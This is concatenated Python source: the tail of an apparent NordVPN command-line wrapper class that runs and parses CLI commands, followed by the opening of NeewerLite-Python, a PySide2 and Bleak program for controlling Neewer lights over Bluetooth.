self._send_command(cmd, self.get_groups_resp, self._base_error_cb)
def get_groups_resp(self, output):
print(f"hello {output}")
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return []
try:
group_list = output.replace(",", "").split()
group_list = list(filter(('-').__ne__, group_list))
self.group_list = group_list
        except Exception:
            self.error_cb("Failed to parse group list. Found: ", output)
        return self.group_list
def get_countries(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._countries}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_countries_resp, self._base_error_cb)
def get_countries_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.country_dict
try:
country_list = output.replace(",", "").split()
country_list = list(filter(('-').__ne__, country_list))
for country in country_list:
cmd = f"{self._base_cmd} {self._cities} {country}"
outs, err = self._send_dir_command(cmd)
city_list = []
if outs:
city_list = outs.replace(",", "").split()
city_list = list(filter(('-').__ne__, city_list))
self.country_dict[country] = city_list
        except Exception:
self.error_cb("Failed to parse Country list. Found: ", output)
return self.country_dict
def get_version(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._version}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_version_resp, self._base_error_cb)
def get_version_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return ""
self.version = output
return self.version
def get_status(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._status}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_status_resp, self._base_error_cb)
def get_status_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.status_dict
try:
rsp_list = output.split("\n")
for item in rsp_list:
if item:
                    key, value = item.split(":", 1)  # split only on the first colon so values may contain colons
key_list = key.split()
key_list = list(filter(('-').__ne__, key_list))
if len(key_list) > 1:
key_list = [f"{key_list[0]}_{key_list[1]}"]
self.status_dict[key_list[0]] = value
        except Exception:
self.error_cb("Failed to parse Status. Found: ", output)
return self.status_dict
def get_settings(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._settings}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_settings_resp, self._base_error_cb)
def get_settings_resp(self, output):
self.settings_dict = {}
self.settings_dict["Whitelisted_subnets"] = []
self.settings_dict["Whitelisted_ports"] = []
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.settings_dict
try:
rsp_list = output.split("\n")
for item in rsp_list:
if "Whitelisted" in item:
pass
elif ":" in item:
                    key, value = item.split(":", 1)  # split only on the first colon so values may contain colons
key_list = key.split()
key_list = list(filter(('-').__ne__, key_list))
if len(key_list) > 1:
key_list = [f"{key_list[0]}_{key_list[1]}"]
self.settings_dict[key_list[0]] = value.replace(" ", "")
elif re.match(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", item.strip()):
self.settings_dict["Whitelisted_subnets"].append(item.strip())
elif re.match(r"\d{1,6}", item.strip().replace("(UDP|TCP)", "")):
self.settings_dict["Whitelisted_ports"].append(item.strip())
        except Exception:
self.error_cb("Failed to parse Settings. Found: ", output)
return self.settings_dict
def get_account_info(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._account}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_account_rsp, self._base_error_cb)
def get_account_rsp(self, output):
if "You are not logged in." not in output:
self.logged_in = True
else:
return None, None, None
try:
rsp_list = output.split("\n")
self.account_information = rsp_list[0].split("Account Information:")[-1]
self.email = rsp_list[1].split("Email Address: ")[-1]
self.vpn_service = rsp_list[2].split("VPN Service: ")[-1]
        except Exception:
self.account_information = ""
self.email = ""
self.vpn_service = ""
return self.account_information, self.email, self.vpn_service
def connect(self, selection, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._connect} {selection}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def connect_rsp(self, output):
pass
def connect_to_country(self, country, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect} {country}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def connect_to_city(self, city, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect} {city}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def quick_connect(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def disconnect(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._disconnect}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.disconnect_rsp, self._base_error_cb)
def disconnect_rsp(self, output):
pass
def login(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._login}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.login_success, self._base_error_cb)
    def login_rsp(self, output):
        # this handler is also wired up as the success callback for logout,
        # so clear the logged_in flag when the CLI reports we are logged out
        if "You are not logged in." not in output and "logged out" not in output.lower():
            self.logged_in = True
        else:
            self.logged_in = False
def logout(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._logout}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.login_rsp, self._base_error_cb)
def login_success(self, output):
if output == "You are already logged in.":
pass
else:
url = output.split("Continue in the browser: ")[1]
webbrowser.open(url)
    def _base_error_cb(self, error):
        print(error)
    def _base_success_cb(self, output):
        pass
def remove_all_whitelist(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def remove_all_whitelist_port(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._port} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def remove_all_whitelist_subnet(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._subnet} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def remove_whitelist_port(self, port, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._port} {port}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def remove_whitelist_subnet(self, subnet, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._subnet} {subnet}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def _send_dir_command(self, cmd):
process = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)
output, error = process.communicate()
return output.decode("utf-8"), error.decode("utf-8")
def _send_command(self, *args):
cmd = args[0]
print(f"Sending Command: {cmd}")
success_cb = args[1]
error_cb = args[2]
process = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)
output, error = process.communicate()
if error:
print(f"Error: {str(error.decode('utf-8'))}")
error_cb(str(error.decode("utf-8")))
else:
print(f"Out: {str(output.decode('utf-8'))}")
success_cb(str(output.decode("utf-8")))
def set_dns(self, dns, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._dns} {dns}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_setting_enabled(self, setting, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {setting} {self._enable}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_setting_disabled(self, setting, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {setting} {self._disable}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_protocol(self, protocol, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._protocol} {protocol}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_technology(self, technology, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._technology} {technology}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
    def _setup_thread(self, cmd, success_cb, error_cb):
        thread = None
        if success_cb:
            thread = Thread(target=self._send_command, args=(cmd, success_cb, error_cb))
        return thread
def _base_error(self, error):
print(error)
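# --------------------------------------------------------------------------
# Hedged usage sketch (not part of the original client). It illustrates the
# callback convention above: pass a success_cb to have the CLI call run on a
# background thread, or omit it to run synchronously with the default parsers.
# It assumes the `nordvpn` CLI is installed and on PATH; the callback names
# below are illustrative only.
if __name__ == "__main__":
    def on_connected(output):
        print("connect output:", output)
    def on_error(error):
        print("connect failed:", error)
    client = NordClient()                         # __init__ runs the info queries synchronously
    print("Known countries:", list(client.country_dict)[:5])
    print("Current status:", client.status_dict)
    client.quick_connect(on_connected, on_error)  # runs the connect command on a background thread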
|
NeewerLite-Python.py
|
#############################################################
## NeewerLite-Python
## by Zach Glenwright
#############################################################
## > https://github.com/taburineagle/NeewerLite-Python/ <
#############################################################
## A cross-platform Python script using the bleak and
## PySide2 libraries to control Neewer brand lights via
## Bluetooth on multiple platforms -
## Windows, Linux/Ubuntu, MacOS and RPi
#############################################################
## Based on the NeewerLight project by @keefo (Xu Lian)
## > https://github.com/keefo/NeewerLite <
#############################################################
import os
import sys
import tempfile
import argparse
import platform # used to determine which OS we're using for MAC address/GUID listing
import asyncio
import threading
import time
from datetime import datetime
# IMPORT BLEAK (this is the library that allows the program to communicate with the lights) - THIS IS NECESSARY!
try:
from bleak import BleakScanner, BleakClient
except ModuleNotFoundError as e:
print(" ===== CAN NOT FIND BLEAK LIBRARY =====")
print(" You need the bleak Python package installed to use NeewerLite-Python.")
print(" Bleak is the library that connects the program to Bluetooth devices.")
print(" Please install the Bleak package first before running NeewerLite-Python.")
print()
print(" To install Bleak, run either pip or pip3 from the command line:")
print(" pip install bleak")
print(" pip3 install bleak")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/bleak/")
sys.exit(1) # you can't use the program itself without Bleak, so kill the program if we don't have it
# IMPORT THE WINDOWS LIBRARY (if you don't do this, it will throw an exception on Windows only)
if platform.system() == "Windows": # try to load winrt if we're on Windows
try:
from winrt import _winrt
_winrt.uninit_apartment()
except Exception as e:
pass # if there is an exception to this module loading, you're not on Windows
importError = 0 # whether or not there's an issue loading PySide2 or the GUI file
# IMPORT PYSIDE2 (the GUI libraries)
try:
from PySide2.QtCore import Qt, QItemSelectionModel
from PySide2.QtGui import QLinearGradient, QColor, QKeySequence
from PySide2.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QShortcut, QMessageBox
except Exception as e:
importError = 1 # log that we can't find PySide2
# IMPORT THE GUI ITSELF
try:
from ui_NeewerLightUI import Ui_MainWindow
except Exception as e:
if importError != 1: # if we don't already have a PySide2 issue
importError = 2 # log that we can't find the GUI file - which, if the program is downloaded correctly, shouldn't be an issue
# IMPORT THE HTTP SERVER
try:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
except Exception as e:
pass # if there are any HTTP errors, don't do anything yet
CCTSlider = -1 # the current slider moved in the CCT window - 1 - Brightness / 2 - Hue / -1 - Both Brightness and Hue
sendValue = [120, 135, 2, 20, 56, 157] # an array to hold the values to be sent to the light - the default is CCT / 5600K / 20%
lastAnimButtonPressed = 1 # which animation button you clicked last - if none, then it defaults to 1 (the police sirens)
lastSelection = [] # the current light selection (this is for snapshot preset entering/leaving buttons)
lastSortingField = -1 # the last field used for sorting purposes
availableLights = [] # the list of Neewer lights currently available to control
# List Subitems (for ^^^^^^):
# [0] - Bleak Scan Object (can use .name / .rssi / .address to get specifics)
# [1] - Bleak Connection (the actual Bluetooth connection to the light itself)
# [2] - Custom Name for Light (string)
# [3] - Last Used Parameters (list)
# [4] - Whether or not to use an Extended CCT Range (boolean)
# [5] - Whether or not to send Brightness and Hue independently for old lights (boolean)
# [6] - Whether or not this light has been manually turned ON/OFF (boolean)
# [7] - The Power and Channel data returned for this light (list)
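# A purely illustrative (hypothetical) example of one entry, assuming a light has
# already been scanned, connected and renamed - the real objects come from Bleak:
# availableLights[0] = [<BLEDevice "NEEWER-RGB660">, <BleakClient>, "Key Light",
#                       [120, 135, 2, 20, 56, 157], False, False, True, [1, 2]]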
# Light Preset ***Default*** Settings (for sections below):
# NOTE: The list is 0-based, so the preset itself is +1 from the subitem
# [0] - [CCT mode] - 5600K / 20%
# [1] - [CCT mode] - 3200K / 20%
# [2] - [CCT mode] - 5600K / 0% (lights are on, but set to 0% brightness)
# [3] - [HSI mode] - 0° hue / 100% saturation / 20% intensity (RED)
# [4] - [HSI mode] - 240° hue / 100% saturation / 20% intensity (BLUE)
# [5] - [HSI mode] - 120° hue / 100% saturation / 20% intensity (GREEN)
# [6] - [HSI mode] - 300° hue / 100% saturation / 20% intensity (PURPLE)
# [7] - [HSI mode] - 160° hue / 100% saturation / 20% intensity (CYAN)
# The list of **default** light presets for restoring and checking against
defaultLightPresets = [
[[-1, [5, 20, 56]]],
[[-1, [5, 20, 32]]],
[[-1, [5, 0, 56]]],
[[-1, [4, 20, 0, 100]]],
[[-1, [4, 20, 240, 100]]],
[[-1, [4, 20, 120, 100]]],
[[-1, [4, 20, 300, 100]]],
[[-1, [4, 20, 160, 100]]]
]
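# Reading the entries above (an inference from the defaults, not authoritative):
# each preset is a list of [light index, parameter list] pairs, where -1 means
# "apply globally / to all lights"; a 3-element parameter list appears to be
# [CCT tag, brightness %, color temperature / 100] and a 4-element list
# [HSI tag, intensity %, hue in degrees, saturation %].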
# A list of preset mode settings - custom file will overwrite
customLightPresets = [
[[-1, [5, 20, 56]]],
[[-1, [5, 20, 32]]],
[[-1, [5, 0, 56]]],
[[-1, [4, 20, 0, 100]]],
[[-1, [4, 20, 240, 100]]],
[[-1, [4, 20, 120, 100]]],
[[-1, [4, 20, 300, 100]]],
[[-1, [4, 20, 160, 100]]]
]
threadAction = "" # the current action to take from the thread
setLightUUID = "69400002-B5A3-F393-E0A9-E50E24DCCA99" # the UUID to send information to the light
notifyLightUUID = "69400003-B5A3-F393-E0A9-E50E24DCCA99" # the UUID for notify callbacks from the light
receivedData = "" # the data received from the Notify characteristic
# SET FROM THE PREFERENCES FILE ON LAUNCH
findLightsOnStartup = True # whether or not to look for lights when the program starts
autoConnectToLights = True # whether or not to auto-connect to lights after finding them
printDebug = True # show debug messages in the console for all of the program's events
maxNumOfAttempts = 6 # the maximum attempts the program will attempt an action before erroring out
rememberLightsOnExit = False # whether or not to save the currently set light settings (mode/hue/brightness/etc.) when quitting out
rememberPresetsOnExit = True # whether or not to save the custom preset list when quitting out
acceptable_HTTP_IPs = [] # the acceptable IPs for the HTTP server, set on launch by prefs file
customKeys = [] # custom keymappings for keyboard shortcuts, set on launch by the prefs file
whiteListedMACs = [] # whitelisted list of MAC addresses to add to NeewerLite-Python
enableTabsOnLaunch = False # whether or not to enable tabs on startup (even with no lights connected)
lockFile = tempfile.gettempdir() + os.sep + "NeewerLite-Python.lock"
anotherInstance = False # whether or not we're using a new instance (for the Singleton check)
globalPrefsFile = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "NeewerLite-Python.prefs" # the global preferences file for saving/loading
customLightPresetsFile = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "customLights.prefs"
# FILE LOCKING FOR SINGLE INSTANCE
def singleInstanceLock():
global anotherInstance
try:
lf = os.open(lockFile, os.O_WRONLY | os.O_CREAT | os.O_EXCL) # try to get a file spec to lock the "running" instance
with os.fdopen(lf, 'w') as lockfile:
lockfile.write(str(os.getpid())) # write the PID of the current running process to the temporary lockfile
except IOError: # if we had an error acquiring the file descriptor, the file most likely already exists.
anotherInstance = True
def singleInstanceUnlockandQuit(exitCode):
try:
os.remove(lockFile) # try to delete the lockfile on exit
except FileNotFoundError: # if another process deleted it, then just error out
printDebugString("Lockfile not found in temp directory, so we're going to skip deleting it!")
sys.exit(exitCode) # quit out, with the specified exitCode
def doAnotherInstanceCheck():
if anotherInstance == True: # if we're running a 2nd instance, but we shouldn't be
print("You're already running another instance of NeewerLite-Python.")
print("Please close that copy first before opening a new one.")
print()
print("To force opening a new instance, add --force_instance to the command line.")
sys.exit(1)
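# Presumed call order for the three functions above (main() appears later in the
# file, so this is a hedged sketch of how they are meant to be used together):
#   singleInstanceLock()             # at startup: create the lock file, or flag anotherInstance
#   doAnotherInstanceCheck()         # bail out early if another copy already holds the lock
#   ...run the GUI or CLI...
#   singleInstanceUnlockandQuit(0)   # on exit: delete the lock file and quit with the given code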
try: # try to load the GUI
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setupUi(self) # set up the main UI
self.connectMe() # connect the function handlers to the widgets
if enableTabsOnLaunch == False: # if we're not supposed to enable tabs on launch, then disable them all
self.ColorModeTabWidget.setTabEnabled(0, False) # disable the CCT tab on launch
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the HSI tab on launch
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the SCENE tab on launch
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the LIGHT PREFS tab on launch
self.ColorModeTabWidget.setCurrentIndex(0)
if findLightsOnStartup == True: # if we're set up to find lights on startup, then indicate that
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
else:
self.statusBar.showMessage("Welcome to NeewerLite-Python! Hit the Scan button above to scan for lights.")
if platform.system() == "Darwin": # if we're on MacOS, then change the column text for the 2nd column in the light table
self.lightTable.horizontalHeaderItem(1).setText("Light UUID")
# IF ANY OF THE CUSTOM PRESETS ARE ACTUALLY CUSTOM, THEN MARK THOSE BUTTONS AS CUSTOM
            for presetNum in range(8):
                if customLightPresets[presetNum] != defaultLightPresets[presetNum]:
                    presetButton = getattr(self, f"customPreset_{presetNum}_Button")
                    if customLightPresets[presetNum][0][0] == -1: # the preset is custom, but a global preset, so mark it that way
                        presetButton.markCustom(presetNum)
                    else: # the current preset is a snapshot preset
                        presetButton.markCustom(presetNum, 1)
            self.show() # show the main window
def connectMe(self):
self.turnOffButton.clicked.connect(self.turnLightOff)
self.turnOnButton.clicked.connect(self.turnLightOn)
self.scanCommandButton.clicked.connect(self.startSelfSearch)
self.tryConnectButton.clicked.connect(self.startConnect)
self.ColorModeTabWidget.currentChanged.connect(self.tabChanged)
self.lightTable.itemSelectionChanged.connect(self.selectionChanged)
# Allow clicking on the headers for sorting purposes
horizHeaders = self.lightTable.horizontalHeader()
horizHeaders.setSectionsClickable(True)
horizHeaders.sectionClicked.connect(self.sortByHeader)
# COMMENTS ARE THE SAME THE ENTIRE WAY DOWN THIS CHAIN
self.customPreset_0_Button.clicked.connect(lambda: recallCustomPreset(0)) # when you click a preset
self.customPreset_0_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(0)) # when you right-click a preset
self.customPreset_0_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(0)) # when the mouse enters the widget
self.customPreset_0_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(0, True)) # when the mouse leaves the widget
self.customPreset_1_Button.clicked.connect(lambda: recallCustomPreset(1))
self.customPreset_1_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(1))
self.customPreset_1_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(1))
self.customPreset_1_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(1, True))
self.customPreset_2_Button.clicked.connect(lambda: recallCustomPreset(2))
self.customPreset_2_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(2))
self.customPreset_2_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(2))
self.customPreset_2_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(2, True))
self.customPreset_3_Button.clicked.connect(lambda: recallCustomPreset(3))
self.customPreset_3_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(3))
self.customPreset_3_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(3))
self.customPreset_3_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(3, True))
self.customPreset_4_Button.clicked.connect(lambda: recallCustomPreset(4))
self.customPreset_4_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(4))
self.customPreset_4_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(4))
self.customPreset_4_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(4, True))
self.customPreset_5_Button.clicked.connect(lambda: recallCustomPreset(5))
self.customPreset_5_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(5))
self.customPreset_5_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(5))
self.customPreset_5_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(5, True))
self.customPreset_6_Button.clicked.connect(lambda: recallCustomPreset(6))
self.customPreset_6_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(6))
self.customPreset_6_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(6))
self.customPreset_6_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(6, True))
self.customPreset_7_Button.clicked.connect(lambda: recallCustomPreset(7))
self.customPreset_7_Button.rightclicked.connect(lambda: self.saveCustomPresetDialog(7))
self.customPreset_7_Button.enteredWidget.connect(lambda: self.highlightLightsForSnapshotPreset(7))
self.customPreset_7_Button.leftWidget.connect(lambda: self.highlightLightsForSnapshotPreset(7, True))
self.Slider_CCT_Hue.valueChanged.connect(lambda: self.computeValueCCT(2))
self.Slider_CCT_Bright.valueChanged.connect(lambda: self.computeValueCCT(1))
self.Slider_HSI_1_H.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_2_S.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_3_L.valueChanged.connect(self.computeValueHSI)
self.Slider_ANM_Brightness.valueChanged.connect(lambda: self.computeValueANM(0))
self.Button_1_police_A.clicked.connect(lambda: self.computeValueANM(1))
self.Button_1_police_B.clicked.connect(lambda: self.computeValueANM(2))
self.Button_1_police_C.clicked.connect(lambda: self.computeValueANM(3))
self.Button_2_party_A.clicked.connect(lambda: self.computeValueANM(4))
self.Button_2_party_B.clicked.connect(lambda: self.computeValueANM(5))
self.Button_2_party_C.clicked.connect(lambda: self.computeValueANM(6))
self.Button_3_lightning_A.clicked.connect(lambda: self.computeValueANM(7))
self.Button_3_lightning_B.clicked.connect(lambda: self.computeValueANM(8))
self.Button_3_lightning_C.clicked.connect(lambda: self.computeValueANM(9))
self.saveLightPrefsButton.clicked.connect(self.checkLightPrefs)
self.resetGlobalPrefsButton.clicked.connect(lambda: self.setupGlobalLightPrefsTab(True))
self.saveGlobalPrefsButton.clicked.connect(self.saveGlobalPrefs)
# SHORTCUT KEYS - MAKE THEM HERE, SET THEIR ASSIGNMENTS BELOW WITH self.setupShortcutKeys()
# IN CASE WE NEED TO CHANGE THEM AFTER CHANGING PREFERENCES
self.SC_turnOffButton = QShortcut(self)
self.SC_turnOnButton = QShortcut(self)
self.SC_scanCommandButton = QShortcut(self)
self.SC_tryConnectButton = QShortcut(self)
self.SC_Tab_CCT = QShortcut(self)
self.SC_Tab_HSI = QShortcut(self)
self.SC_Tab_SCENE = QShortcut(self)
self.SC_Tab_PREFS = QShortcut(self)
# DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
self.SC_Dec_Bri_Small = QShortcut(self)
self.SC_Inc_Bri_Small = QShortcut(self)
self.SC_Dec_Bri_Large = QShortcut(self)
self.SC_Inc_Bri_Large = QShortcut(self)
# THE SMALL INCREMENTS *DO* NEED A CUSTOM FUNCTION, BUT ONLY IF WE CHANGE THE
# SHORTCUT ASSIGNMENT TO SOMETHING OTHER THAN THE NORMAL NUMBERS
# THE LARGE INCREMENTS DON'T NEED A CUSTOM FUNCTION
self.SC_Dec_1_Small = QShortcut(self)
self.SC_Inc_1_Small = QShortcut(self)
self.SC_Dec_2_Small = QShortcut(self)
self.SC_Inc_2_Small = QShortcut(self)
self.SC_Dec_3_Small = QShortcut(self)
self.SC_Inc_3_Small = QShortcut(self)
self.SC_Dec_1_Large = QShortcut(self)
self.SC_Inc_1_Large = QShortcut(self)
self.SC_Dec_2_Large = QShortcut(self)
self.SC_Inc_2_Large = QShortcut(self)
self.SC_Dec_3_Large = QShortcut(self)
self.SC_Inc_3_Large = QShortcut(self)
self.setupShortcutKeys() # set up the shortcut keys for the first time
# CONNECT THE KEYS TO THEIR FUNCTIONS
self.SC_turnOffButton.activated.connect(self.turnLightOff)
self.SC_turnOnButton.activated.connect(self.turnLightOn)
self.SC_scanCommandButton.activated.connect(self.startSelfSearch)
self.SC_tryConnectButton.activated.connect(self.startConnect)
self.SC_Tab_CCT.activated.connect(lambda: self.switchToTab(0))
self.SC_Tab_HSI.activated.connect(lambda: self.switchToTab(1))
self.SC_Tab_SCENE.activated.connect(lambda: self.switchToTab(2))
self.SC_Tab_PREFS.activated.connect(lambda: self.switchToTab(3))
# DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
self.SC_Dec_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, -1))
self.SC_Inc_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, 1))
self.SC_Dec_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, -5))
self.SC_Inc_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, 5))
# THE SMALL INCREMENTS DO NEED A SPECIAL FUNCTION-
# (see above) - BASICALLY, IF THEY'RE JUST ASSIGNED THE DEFAULT NUMPAD/NUMBER VALUES
# THESE FUNCTIONS DON'T TRIGGER (THE SAME FUNCTIONS ARE HANDLED BY numberShortcuts(n))
# BUT IF THEY ARE CUSTOM, *THEN* THESE TRIGGER INSTEAD, AND THIS FUNCTION ^^^^ JUST DOES
# SCENE SELECTIONS IN SCENE MODE
self.SC_Dec_1_Small.activated.connect(lambda: self.changeSliderValue(1, -1))
self.SC_Inc_1_Small.activated.connect(lambda: self.changeSliderValue(1, 1))
self.SC_Dec_2_Small.activated.connect(lambda: self.changeSliderValue(2, -1))
self.SC_Inc_2_Small.activated.connect(lambda: self.changeSliderValue(2, 1))
self.SC_Dec_3_Small.activated.connect(lambda: self.changeSliderValue(3, -1))
self.SC_Inc_3_Small.activated.connect(lambda: self.changeSliderValue(3, 1))
# THE LARGE INCREMENTS DON'T NEED A CUSTOM FUNCTION
self.SC_Dec_1_Large.activated.connect(lambda: self.changeSliderValue(1, -5))
self.SC_Inc_1_Large.activated.connect(lambda: self.changeSliderValue(1, 5))
self.SC_Dec_2_Large.activated.connect(lambda: self.changeSliderValue(2, -5))
self.SC_Inc_2_Large.activated.connect(lambda: self.changeSliderValue(2, 5))
self.SC_Dec_3_Large.activated.connect(lambda: self.changeSliderValue(3, -5))
self.SC_Inc_3_Large.activated.connect(lambda: self.changeSliderValue(3, 5))
# THE NUMPAD SHORTCUTS ARE SET UP REGARDLESS OF WHAT THE CUSTOM INC/DEC SHORTCUTS ARE
self.SC_Num1 = QShortcut(QKeySequence("1"), self)
self.SC_Num1.activated.connect(lambda: self.numberShortcuts(1))
self.SC_Num2 = QShortcut(QKeySequence("2"), self)
self.SC_Num2.activated.connect(lambda: self.numberShortcuts(2))
self.SC_Num3 = QShortcut(QKeySequence("3"), self)
self.SC_Num3.activated.connect(lambda: self.numberShortcuts(3))
self.SC_Num4 = QShortcut(QKeySequence("4"), self)
self.SC_Num4.activated.connect(lambda: self.numberShortcuts(4))
self.SC_Num5 = QShortcut(QKeySequence("5"), self)
self.SC_Num5.activated.connect(lambda: self.numberShortcuts(5))
self.SC_Num6 = QShortcut(QKeySequence("6"), self)
self.SC_Num6.activated.connect(lambda: self.numberShortcuts(6))
self.SC_Num7 = QShortcut(QKeySequence("7"), self)
self.SC_Num7.activated.connect(lambda: self.numberShortcuts(7))
self.SC_Num8 = QShortcut(QKeySequence("8"), self)
self.SC_Num8.activated.connect(lambda: self.numberShortcuts(8))
self.SC_Num9 = QShortcut(QKeySequence("9"), self)
self.SC_Num9.activated.connect(lambda: self.numberShortcuts(9))
def sortByHeader(self, theHeader):
global availableLights
global lastSortingField
if theHeader < 2: # if we didn't click on the "Linked" or "Status" headers, start processing the sort
sortingList = [] # a copy of the availableLights array
checkForCustomNames = False # whether or not to ask to sort by custom names (if there aren't any custom names, then don't allow)
for a in range(len(availableLights)): # copy the entire availableLights array into a temporary array to process it
if theHeader == 0 and availableLights[a][2] != "": # if the current light has a custom name (and we clicked on Name)
checkForCustomNames = True # then we need to ask what kind of sorting when we sort
sortingList.append([availableLights[a][0], availableLights[a][1], availableLights[a][2], availableLights[a][3], \
